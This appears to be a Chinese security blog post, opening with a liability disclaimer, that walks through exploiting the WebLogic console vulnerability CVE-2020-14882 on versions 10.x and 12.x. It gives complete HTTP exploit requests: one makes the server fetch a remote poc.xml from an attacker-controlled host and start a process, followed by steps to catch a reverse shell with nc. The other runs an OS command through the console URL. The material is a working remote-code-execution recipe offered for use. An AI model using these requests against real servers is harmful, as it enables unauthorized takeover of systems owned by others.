声明

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。

雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

No.1

Weblogic console 10.x版本利用

1、构造如下exp。

  •  
POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1Host: xxxx:7001Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 154
_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://xxx:1234/poc.xml")

poc.xml内容:

  •  
<beans xmlns="[http://www.springframework.org/schema/beans](http://www.springframework.org/schema/beans)" xmlns:xsi="[http://www.w3.org/2001/XMLSchema-instance](http://www.w3.org/2001/XMLSchema-instance)" xsi:schemaLocation="[http://www.springframework.org/schema/beans](http://www.springframework.org/schema/beans) [http://www.springframework.org/schema/beans/spring-beans.xsd](http://www.springframework.org/schema/beans/spring-beans.xsd)">  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">    <constructor-arg>      <list>        <value>cmd</value>        <value>/c</value>        <value><![CDATA[calc]]></value>      </list>    </constructor-arg>  </bean></beans>

2、开启python监听。

Weblogic CVE-2020-14882(10.x 12.x) 利用方式_Weblogic

nc开启监听。

Weblogic CVE-2020-14882(10.x 12.x) 利用方式_Weblogic_02

3、发送exp。

Weblogic CVE-2020-14882(10.x 12.x) 利用方式_Weblogic_03

4、成功请求poc.xml。

Weblogic CVE-2020-14882(10.x 12.x) 利用方式_Weblogic_04

5、成功反弹shell。

Weblogic CVE-2020-14882(10.x 12.x) 利用方式_Weblogic_05

No.2

Weblogic console 12.x版本利用

命令执行:

  •  
GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27whoami%27);%22); HTTP/1.1Host: 140.xxx.xxx:7001User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: ADMINCONSOLESESSION=6hjQfZ0Y6G21TlS5VTp376gsGmky5X7TP3TDyfBQlLNBjkTnb7r5!916198412Upgrade-Insecure-Requests: 1

Weblogic CVE-2020-14882(10.x 12.x) 利用方式_Weblogic_06

参考

https://github.com/jas502n/CVE-2020-14882
https://mp.weixin.qq.com/s/48VIwTkyFVXUTS78kNByhg